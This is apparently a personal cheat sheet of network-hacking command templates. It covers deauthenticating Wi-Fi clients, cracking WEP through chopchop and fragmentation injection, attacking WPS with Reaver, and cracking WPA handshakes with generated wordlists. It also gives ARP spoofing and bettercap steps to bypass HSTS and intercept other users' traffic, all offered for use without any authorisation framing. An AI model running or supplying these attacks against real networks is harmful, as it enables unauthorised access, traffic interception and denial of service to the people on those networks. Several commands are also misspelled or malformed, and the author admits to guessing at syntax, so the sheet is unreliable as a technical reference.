NETWORK HACKING |||  
```````````````````
/Activate Monitor Mode/
ifconfig [device name] down 
airmon-ng check kill 
iwconfig [device name] mode monitor 
ifconfig [device name] up
====================================
/Sniffing Packets Airmon-ng/
airodump-ng --band abg [device name] 
airodump-ng --bssid [Target's MAC] --channel [#of chann] --write (name of outputfile) [device name]
====================================================================================================
/Deauthentication/
airplay-ng --deauth [#DeauthPackets] -a [NetworkMAC] -c [Target'sMAC] [device interface]
=========================================================================================
/WEP CRACK/
aircrack-ng [file from airdump-ng]

/AP generate new IVs/
airplay-ng --fakeauth 0 -a [TARGETsMAC] -h [DEVICE'sMAC] [wlan0]
airplay-ng --arpreplay -b [TARGETsMAC] -h [DEVICE'sMAC] [wlan0]

/Packet injection korek chopchop attack/
1.Airodump-ng on the network
2.Run Fakeauth 
3.aireplay-ng --chopchop -b [targets mac] -h [wlan's mac] [wlan0]
4.packetforge-ng -a [targets mac] -h [wlans mac] -k 255.255.255.255 -l 255.255.255.255 -y [file created in step 3 .xor] -w [desired name for the packet]
5. 5.1. run a fakeauth again, just in case. 5.2. aireplay-ng -2 -r [packet forged in step 4] [wlan0]
6. Run aircrack-ng after injecting the packet in the network. Remember, you need to be running airmon-ng before injecting the packet, save output to a file. 

/Packet injection using a Fragmentation Attack/
1.Airodump-ng 
2.Fake Auth 
3.aireplay-ng --fragment -b [targets mac] -h [wlans mac] [wlan0]
4.packetforge-ng -0 -a [targets mac] -h [your mac] -k 255.255.255.255 -l 255.255.255.255 -y [file from step3 .xor] -w [desired packet name]
5.aireplay-ng -2 -r [packet from last step] [wlan0] 
6.run airodump-ng before injecting the packet and save the output to a file.
7.run aircrack-ng to the output file from airmon-ng 
===============================================================================================================================================================
/WPA,WPA2 CRACK/

/WPS EXPLOIT/
1.wash --interface [wlan0]\\List networks that use WPS
2.SET UP fake aut, DONT LAUNCH YET. 
3.reaver --bssid [targets mac] --channel [targets channel] --interface [wlan0] -vvv --no-associate\\last two parts of the syntax might be wrong, dont know, try it!

/Fake AUTH for WPA/
aireplay-ng --fakeauth 30 -a [targets mac] -h [devices mac] [wlan0]

/Wordlist with CRUNCH to crack handshake/
crunch [min][max][characters] -t [pattern] -o [file with the handshake]
/Cracking with aircrack/
aircrack-ng [name of the handshake file] -w [wordlist.txt]
/Convert Wordlist To PMK/
1.airolib-ng [desired for new database] --import passwd [wordlist.txt]
2.echo [networks ESSID] [desired file name]
3.cat [databases name]\\Just to read the File 
4.airolib-ng [data base from step1] --import ESSID [file created in step3]
5.airolib-ng [data base's name] --batch\\this converts each password in the list with the ESSID to create a list of PMKS.
6.crack the handshake file with batched data base: aircrack-ng -r [data bases name] [handshake file]
======================================================================================================================================================================
/NETDISCOVER/
netdiscover -r [ip /24 or /16]
===================================
/ZENMAP/
USE GUI
=========
/ARP SPOOF/
enabling port forwarding in LINUX: echo > 1 /proc/sys/net/ipv4/ip_forward
-arpspoof -i [wlan0] -t [target ip] [gateway ip]
-arpspoof -i [wlan0] -t [gateway ip] [targets ip]//After fowarding packets, Run wireshark and analyze everything. 

/BETTERCAP/
sintaxys: bettercap -iface [interface connected to the network:eth0, wlan0] -caplet [.cap]\\remember to change the ip of the desired target. 
For HTTP, HTTPS, HSTS bypass; use the hstsijack/hstsijack caplet.
Bettercap Caplets Folder:  /usr/local/share/bettercap/caplets
===============================================================================================================================================
USEFULL COMMANDS: 

-Wireless Adapter Drivers: 
sudo apt update
sudo apt upgrade 
sudo apt install realtek-rtl88xxau-dkms

-Re enable NetworkManager functions after killing all network processes 
a.Service network-manager restart
b.service NetworkManager restart
c.service avahi-daemon restart


zip -9 archivename.zip filename1 filename2 filename3
